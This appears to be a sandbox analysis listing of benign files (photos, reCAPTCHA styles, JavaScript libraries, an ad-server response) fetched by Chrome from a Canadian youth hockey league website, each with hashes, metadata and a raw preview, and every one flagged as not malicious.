                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):889
                                                                                                                          Entropy (8bit):7.661585657627459
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6p0WpoO7NJHabxgWdiZ/ZGr9zfWeEfiATRU1:S/6qWWOZJ2gB/8rNEf9TU
                                                                                                                          MD5:CEDA85DC6354796FD08C69A2032D2B29
                                                                                                                          SHA1:88814A3DAE3B5DB844E1EBC743B4617C9AF8B166
                                                                                                                          SHA-256:D1E95C82A1F0761DDC6F245A372A3954BBF32157A8DCDFF4659A0F9574ACE46B
                                                                                                                          SHA-512:E15949E990A278C6DCDF7FBEF76A41DC66209716B56BCF8FFC745FF615CDE7F00B167DE7FF9AE23B5B28C4111413535341F15E1A633EF28539644800E84FB015
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................+IDATx...O.A..7341...'#h.....?.G..(.......$.3E....../...1^...$.H.........c.V.n....-..&.....3....aD..).Tl.<C..Q.I.p.r.S.......k.q.W>k..%r.C?e.r.J.`^........-r&).ee...\"...1.1...cJ...A.N..8..w..K.C.o.._Z.Q...1O.......<..`.n].b.C0.............V.T.%:'......yVt.g...^.E..|.6.7l.Gq.M^L..b.R..tyry....Vu..J....[b....OW...A....t+....p...y7......~..eDy..Q...>e.O.z..[ih.P....5qs....e......yy..8......W9.c.................f..^....m.....-..p\a......N..s..V.cJe.........r*.....@..M..|..#........|."._d..p.B.\...T.B..X....&...Q..l.'....R@eT.GB..P...m..1nv.|...M./+.*.....>q..(b,........%..2../s.i.4..fo..4..0\.....f.......z.... ...IA.-....j...C[....Sil...M..y.O.v.[.=....kF...>7]:...V}.y..t....Dn.!...E.:.g.k....j.R..x.`.M...*....y.6./......p.xm...E..nW...hW..V-y%..G..S...)R$.`.7.!....l.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:12:04 00:49:20], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):127407
                                                                                                                          Entropy (8bit):7.870462151965861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:AtFd3SxGDzQikwX3sn7SPaFP3l1QtRK09Iwspr/:iix+zQGIIaFP3leJ9Cr/
                                                                                                                          MD5:1115A9AF4937C1E49A63FA04E5D3525E
                                                                                                                          SHA1:8657CC5FA8ACEA164034E4155FA0D72C0A19BEAD
                                                                                                                          SHA-256:6B2D0D827449C43B5729838CA7F961F6C0AB7A68CBD5CC6CB559598B9396FC08
                                                                                                                          SHA-512:C043D30468812279E1D45B591C1C48C182973E0C8EE71776F45ABF0520C8B9C5B432A5BB5F9D27DD64E358AA51B911D0CDE7AFE0FF116B103F94C856D781182D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/05143829/0C9A4640-730x487.jpg
                                                                                                                          Preview:......JFIF............W.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:12:04 00:49:20.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................94..........94..................................................................................................1...........2....... ...4.......@...5.......X............... .......2024:12:01 19:27:28.2024:12:01 19:27:28.-05:00..-05:00..-05:00...=..@B...53.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(................................S..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=9, manufacturer=Canon, model=Canon EOS 2000D, orientation=upper-left, xresolution=144, yresolution=152, resolutionunit=2, datetime=2022:11:19 05:53:50], baseline, precision 8, 730x420, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):57890
                                                                                                                          Entropy (8bit):7.960805690416624
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:SRebAxk6BoOYnAUGzPyiSO0NUNamzreenzyuNy2F3:EiKBYnGzqiocreeOuEG
                                                                                                                          MD5:5AB7D753310BE7140088FDB96B9CE6FA
                                                                                                                          SHA1:F47844FCBDBF3C5C2649F5AEBAA02163CC173479
                                                                                                                          SHA-256:A63F5F890C1696AB9EAC5664366120263B9C30B4B3D6E71B10E40BD443356111
                                                                                                                          SHA-512:B796217A92A45F5C899220E24818ADCE3AE8ED5AC8381C53C903283C5B6CE8761208EFB5237C21A76B512CF17DF0504E625120D474F8D307B01EB160CCDECD74
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/22115759/IMG_6412-e1729706741707-730x420.jpg
                                                                                                                          Preview:......JFIF.....H.H.....,Exif..MM.*.................z.................................................(...........2.......................i..............Canon.Canon EOS 2000D....H.......H....2022:11:19 05:53:50..#...........^...........f."...........'...........0...........2..................0230...........n....................................................................................................................93..........93..........93..........0100.......................p................................................................................................1..........2..........4...........5.....................(........2022:11:19 05:53:50.2022:11:19 05:53:50....+..........................u,.........O@......=.....Q287031002628..................................EF-S18-200mm f/3.5-5.6 IS.00004609b9.......(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):78685
                                                                                                                          Entropy (8bit):6.020282308187139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIQbkhXwW5vxM:mGRFauOxLA/+IcTOuXK
                                                                                                                          MD5:6AEC8CFD5D3A790339DC627F9F1229B5
                                                                                                                          SHA1:B6C8CFFE38E1015DD8595F2DD1A92435E2795874
                                                                                                                          SHA-256:80583FA3C83831A9E036EBA0500D1B9C0D30892D0701F1617E0FAFAF5AEAA2CA
                                                                                                                          SHA-512:4279E479C860007D04CD6FF0B8C45131C18D87420CD5CEB5C727A7DDBFB4206D007069102D643DA97C3BF01D0B756A2EF4662C8E39B6969FC154DE3C763B1EFC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/styles__ltr.css
                                                                                                                          Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:07 11:51:13], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):78473
                                                                                                                          Entropy (8bit):7.759847390549481
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:njfMB6rbYI6YWbn6x42BlXLhdJAKCJVFynzh8fF8NbvVt/ps:nrP6bV27DJADJfUhVBvBs
                                                                                                                          MD5:680A0FDAD729FEC37C86C09D7B72256C
                                                                                                                          SHA1:CF86D3291A4F56694955FBCF4718235B237AA32D
                                                                                                                          SHA-256:8A359781A14C3FF1F0B749B4443926EF8B63596D96098B8DDB6A41DD821DCB75
                                                                                                                          SHA-512:A1E86D182F5FC05AB678588C2EA4836F8BE15E074432F312266962BEF1EE9ABA1BDCB828F794A7C0C34BDAA61D791ECE94BF9CD9C4E5C49E58460728A6776875
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg
                                                                                                                          Preview:......JFIF............2vExif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:07 11:51:13.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:11:02 12:37:01.2024:11:02 12:37:01.-05:00..-05:00..-05:00..X.y.@B...T-.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 730x408, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):67853
                                                                                                                          Entropy (8bit):7.965041072943386
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:H6p9caIb0zrk2nBcPr8aDei4FXZHFkXlohHtWuF9LuGrasCX:H6p7VzrkMcgaD2JFskHtX9uGrasCX
                                                                                                                          MD5:5DDDE54FDF9CC70B26A79CA314ABB274
                                                                                                                          SHA1:56A231F6B4520AD20A3511565969842781AF2C8C
                                                                                                                          SHA-256:D33FEA40F63782B8F7A42F7A958EF3B773394AE0C41DC3FD786DE0CEF3068F9F
                                                                                                                          SHA-512:145C6C69F3418BE6734E88FD380AC92C1ED529619433B3DD9B9E4E5F5F06DFE25FF2D82DDF2D100F0B359A975D67D6BE84DD29E1181D4DB20E6E76D55F2408E6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt...<...0ndin...l...>mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........E.S.-.2.4.X.3..text....Copyright Apple Inc., 2024..XY
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):70662
                                                                                                                          Entropy (8bit):5.936114583795898
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:T4D98glRj5nDFvSCd1CORiW4VG3C5xGlu91Y:+984ZPvSCdLNPlug
                                                                                                                          MD5:F3CBE7763B53B6CC17B75A6F61819822
                                                                                                                          SHA1:9B85651285951A3AA6ACD4D206ACEE43996084CF
                                                                                                                          SHA-256:168F6A6410C688DEE8759BFAFE2D6D88D0EC7C9F9075CD79D7630EE538C3A72D
                                                                                                                          SHA-512:63CC6A2633A3198412F2B98526C183B67BE5CF1F2C0838880F851F9B1CE1D703335FE103908D5BD83A99BDBBE5462408010FCD727A17899BB050570E199FA46F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_BigBox_1&enc_prev_ius=%2F0%2F1&prev_iu_szs=300x600%7C300x250&ifi=1&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081707&lmt=1736802081&adxs=1239&adys=469&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=1&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=300x0&msz=300x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=739091630&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ed&tdf=2
                                                                                                                          Preview:{"/128473736/GTHL_BigBox_1":["html",0,null,null,0,250,300,0,0,null,null,null,1,[["ID=c0cdd03306273c59:T=1736802083:RT=1736802083:S=ALNI_Ma9Vbd0t4ehpFdaCEvXfoU04e3wgA",1770498083,"/","gthlcanada.com",1],["UID=00000fcdc3f4beab:T=1736802083:RT=1736802083:S=ALNI_MaQPNsw8lJX1QTFcYlOpSy09S_yig",1770498083,"/","gthlcanada.com",2]],[138478342630],[6736155286],[1138327936],[3553617818],null,null,null,null,null,null,null,0,[676982961],null,null,null,null,null,"AOrYGsljZswTByzxNpa9p7vn4Cw0LzgsZoyECa3qSzVFef_JCdVJPXpgq3nz4sFJmMXyUjmUcAZMV8uQFqynkA","CJKy4vnL84oDFVS_0QQdnTkGtA",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qPWlUfjz3ndeT75akBAeBainO2kpJc_-mrWySl6lamr5zbqa9Y-fKm8Ns8pXsJWlkyhUjqTFnak",null,null,null,null,null,null,[["ID=b5ec9b52287c5f6b:T=1736802083:RT=1736802083:S=AA-AfjZ6UTJekfRHUu3Wf7OvyBrV",1752354083,"/","gthlcanada.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20250109';<
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):195222
                                                                                                                          Entropy (8bit):4.63627999816095
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eHGylWlyDD/DCD/DCDAc8NrJrriXkrlbuv5DDD2DDHot70WfJrHFP2h7G+Wofez:yGTyyY0Wfd
                                                                                                                          MD5:6E013D57DE886B205B2ACC63DDDF70D8
                                                                                                                          SHA1:89886EBD3564645A83B1CFC2A3ED6AC95BD6B62C
                                                                                                                          SHA-256:D5FF1E7AB48644F9634DCAFE79F3C7A9F9C45E62BA751EAF8F2951F84BFEA3B5
                                                                                                                          SHA-512:61F2176C88807E5FE2F4B3B83D411363187BDAF7A2544F62C5622D4CEC76EBB2E262C595007B933B5DE31308841401EB06D1FCEDAE3BFAC7A1A94317DCBDE2DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js
                                                                                                                          Preview:!function(c,M){"use strict";"object"==typeof module&&module.exports?module.exports=M(require("moment")):"function"==typeof define&&define.amd?define(["moment"],M):M(c.moment)}(this,function(b){"use strict";void 0===b.version&&b.default&&(b=b.default);var M,a={},p={},n={},i={},e={};b&&"string"==typeof b.version||S("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/");var c=b.version.split("."),A=+c[0],o=+c[1];function L(c){return 96<c?c-87:64<c?c-29:c-48}function z(c){var M=0,A=c.split("."),o=A[0],z=A[1]||"",b=1,a=0,p=1;for(45===c.charCodeAt(0)&&(p=-(M=1));M<o.length;M++)a=60*a+L(o.charCodeAt(M));for(M=0;M<z.length;M++)b/=60,a+=L(z.charCodeAt(M))*b;return a*p}function O(c){for(var M=0;M<c.length;M++)c[M]=z(c[M])}function q(c,M){for(var A=[],o=0;o<M.length;o++)A[o]=c[M[o]];return A}function r(c){var M=c.split("|"),A=M[2].split(" "),o=M[3].split(""),z=M[4].split(" ");return O(A),O(o),O(z),function(c,M){for(var A=0;A<M;A++)c[A]=Math.round((c[A-1]||
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:26 12:51:52], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):113124
                                                                                                                          Entropy (8bit):7.8382193039209405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:zvq5voHJoF8eaqjLnR+FB4EApzbBvJBycIEr:MvsgsyO4NpzbBxBJ5r
                                                                                                                          MD5:D1893F6C477BE37E8388DC8B656B9DEF
                                                                                                                          SHA1:E91C6CD6623532A3A62F2E247699A7B797F99885
                                                                                                                          SHA-256:5D4952D787E02CC22A117C1CB8951641B2F09BBF63F06BFC8E8BC3FE651A51F0
                                                                                                                          SHA-512:AB9851E02520891653A631AF47A1868ACAACDB71AD6B50A9B7BB35B123EB27AA2E68572D8509615C6E62DBD4087AE7E1AC9A7ED4AD7A4B64A904549864BF2C66
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF............MGExif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:26 12:51:52.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................48..........48..................................................................................................1...........2....... ...4.......@...5.......X............... .......2024:11:24 15:20:29.2024:11:24 15:20:29.-05:00..-05:00..-05:00...=..@B...53.@B..................?.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................}I..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 197x197, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):90825
                                                                                                                          Entropy (8bit):7.972866927008382
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:tz2BxkJouQrblLwnwGUTDsFzSQqW/BIixRtZ26ASLMipJnYVRKb358sGO6F:ty9uRxUTTQqW/qmPk6ASLfpqKr+3F
                                                                                                                          MD5:7219E58173FF112FD7ED0BB3979B1EEB
                                                                                                                          SHA1:F34D306DD92239FCEB76DCB14B90335DA0E8C3C3
                                                                                                                          SHA-256:905ADC220274D01E29FEF8EA500D2855DA3E5BFD8AC80D78A8841DAB9991A562
                                                                                                                          SHA-512:4261D8E4BB116D39BE361FC4D339480F16A5DEEA712A3B346EDA092DA7039F8185F61BCADB2FFE2879B0AD68553558E9B25FB9A4B08A5DD23B02F5182087068D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x411.jpg
                                                                                                                          Preview:......JFIF.............C....................................................................C............................................................................"..........................................Z..........................!..1..AQa."q.2B.....#Rbr..$3.....4CS.%cs...D...6T....&'5Ed.U...................................<.......................!..1AQ."a..2q......B...#Rbr..$.C..............?..5._K......I.U.....>JO...r.0.....-a..R...f.l73.....6...j.).e'.T.....z$>.:...c...Eo.;...F.l..(....C.QeFz.#2\#lG.......e...>.1..+'|.2Laz...ws.&..C%..#...\.N..%.'.!.d..U..}Xi..W.._4mv.i..Qm.jf.P.^.....z..?.*"."..Q./.D.}\.1.....2..H.D....?..qT*.}..a.....>.G.......NN...m$.%.._..B.k.....%..m..s.....jv...mEA....A....8......\...A)Gz.eL.} ..v..k.........%`....o.+..}.)..(..v.8.Z....N..T.k.%..\.R.X..].....Q./...J.*.U~TIT..D.E .##.`...$....Ou.tTB@R3.T|.'..sX.).D...'../56...@.JH.7.!...W..L.i......8.RNc...S....&..u;.....S.]n$.H...."..7..{.1e..7T.D..!!.L..Ae3U..W#....6.0b.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2698
                                                                                                                          Entropy (8bit):7.903031751191032
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:S/62QKxtmU2cngsLQIr5+NlaSFIFdK+dsnaF2Z+N0eK0dKGXwUGU2CgIZx05h3vT:SS2Qi3gsUI00F2oXdzLGI7Zah3Zd/z
                                                                                                                          MD5:B3C9CE60DD1D75ED3F597202C82C05E7
                                                                                                                          SHA1:3D1DB4A9060084F50BE6E15889D94634AA088A8C
                                                                                                                          SHA-256:02D530763915CAC5ACD0BC8E772DB4B08776CC6D5F9CC820D65A2EECCE62A4B8
                                                                                                                          SHA-512:4CC92156CE32A5EA1FC016A092F3923B044F88E528FE47750DC5292A1C90988A8243F1998DAF94874400BBA145746A9584AF4F75B4ABECE4A261E2DBE53F4B5E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................<IDATx...TUe.........{.....`.N:.|+.....g.XMV..3...e/..5.|5N:*VJK.Q.>R+5D. ..|...<...:.w..c..5k...k].w........*J..Y..........x..........u6Y....W.._F.'...WI.`.]C...X..Xr.B-k.C..y4....C;.....d.*j.O..m...YD....Z. ....~..H\s'..O..>.t.&a4..P....d..%....;J.c..NL.B.....?.Ot.Bq..#..M0.L..a&pH...5.2GQp.o.`_...E.kr..N...Kp.LB.<...!.$.<.s.Y.s.l...1....@..lv..6.5../...A.$ .2...nq}f|...UA..d....[...rJ0.U.MV.dV.}^.._'...C...u2......n..Bj'^.^.s.5!..E...$u..K}.%..<..+..........4..1....*/..`?...Kx.7.|.2..V&..".>rM$.2Ws`.i.1r.)~...g.]}v....).7.....<.{./.....c.\*......J.\..nX.p/{k=...VJ.>t.&\M8.{.?.......j.V]..>kY..^K...B.K....{.X..........y.G..?=:....E.]KJ..q*`TKY...e?;.....s..).6....>l.h.u.........)l7$.G..h......TV.}...W.y.w.S.ofFt:....#..s...r.Jp.S.........':.*K.P..w...#...Q.....#...@m.|....s.P....o*...9v.3......|Y@..X.....N...u..F.."./C.....b8l.%.....x....Z.g,..c..`.*:....O...L..B..b........ZI
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (654)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):560258
                                                                                                                          Entropy (8bit):5.668859512958225
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:QStgGd8JmYx0sb6h8YfALjbBksK8ecdy7FdzZA96fcJ2fL2iJ5B7lXaqy2:Gn8hALjbispecknzXfIKhX7
                                                                                                                          MD5:19DDAC3BE88EDA2C8263C5D52FA7F6BD
                                                                                                                          SHA1:C81720778F57C56244C72CE6EF402BB4DE5F9619
                                                                                                                          SHA-256:B261530F05E272E18B5B5C86D860C4979C82B5B6C538E1643B3C94FC9BA76DD6
                                                                                                                          SHA-512:393015B8C7F14D5D4BDB9CCEED7CD1477A7DB07BC7C40BAE7D0A48A2ADFA7D56F9D1C3E4EC05C92FDE152E72FFA6B75D8BF724E1F63F9BC21421125667AFB05C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var X=function(){return[function(N,a,U,y,A,l,z){if((l=["toString",6,"constructor"],N&71)==N)if(typeof U==="string")z={buffer:Z[11](17,1,a,U),qH:!1};else if(Array.isArray(U))z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===Uint8Array)z={buffer:U,qH:!1};else if(U[l[2]]===ArrayBuffer)z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===WC)z={buffer:r[9](25,a,null,U)||new Uint8Array(0),qH:!0};else if(U instanceof Uint8Array)z={buffer:new Uint8Array(U.buffer,U.byteOffset,U.byteLength),qH:!1};else throw Error("Type not convertible to a Uint8Array, expected a Uint8Array, an ArrayBuffer, a base64 encoded string, a Byt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70274
                                                                                                                          Entropy (8bit):4.339041568655532
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:7BezcHmrlGI2R8mhNibroDyFDJAlqCIWglOo:FezcHgGI2R8mhNibroDyFDJAl9o
                                                                                                                          MD5:9003CE006332652CA6790949AF7C4C9D
                                                                                                                          SHA1:A7A2FE3A7F0064BA259862D9A5AA0907A7BABD23
                                                                                                                          SHA-256:57D77C8CA1EF7313363B200848555760678E8E85CF356248F5C67180212022C5
                                                                                                                          SHA-512:126FDACF49D4A689F83B4B12DBB609718020BA8C73FD4C81923252AE1896B3720C1506CEF18DF7B467CA8BFC061AF6DA230340A9A59C63E4C5DCCF6CADC97DA6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*. _ _ _ _. ___| (_) ___| | __ (_)___./ __| | |/ __| |/ / | / __|.\__ \ | | (__| < _ | \__ \.|___/_|_|\___|_|\_(_)/ |___/. |__/.. Version: 1.5.0. Author: Ken Wheeler. Website: http://kenwheeler.github.io. Docs: http://kenwheeler.github.io/slick. Repo: http://github.com/kenwheeler/slick. Issues: http://github.com/kenwheeler/slick/issues.. */./* global window, document, define, jQuery, setInterval, clearInterval */.(function(factory) {. 'use strict';. if (typeof define === 'function' && define.amd) {. define(['jquery'], factory);. } else if (typeof exports !== 'undefined') {. module.exports = factory(require('jquery'));. } else {. factory(jQuery);. }..}(function($) {. 'use strict';. var Slick = window.Slick || {};.. Slick = (function() {.. var instanceUid = 0;.. function Slick(element, settings) {.. var _ = this,. dataSettings, responsiveSettings, breakpoint;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x410, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):60817
                                                                                                                          Entropy (8bit):7.958509702060056
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:ZYeeciS7aQ2PYvyp4NWaakqLR37lWombVaOrhsLo:W1MaQdE4NhakqLRLlm9hsLo
                                                                                                                          MD5:5253271F085DADF8889F2833EE750EC6
                                                                                                                          SHA1:36E4D6D46441518E329B30EEA8A2B5F2DCAE0EBE
                                                                                                                          SHA-256:69323A478A2C6FF018D568E840A7BF2DACFFC376D85890C84398BC8DE00C1058
                                                                                                                          SHA-512:4F8D09B21945AA1FDC0F2E74F1F4C1609EC0822AFBC78F2107DA8D6F0F8F82592DA20621B3BDEC64499240302E37CAA714944147C118CAEE47390929F1ED2F37
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Graphic-730x410.jpg
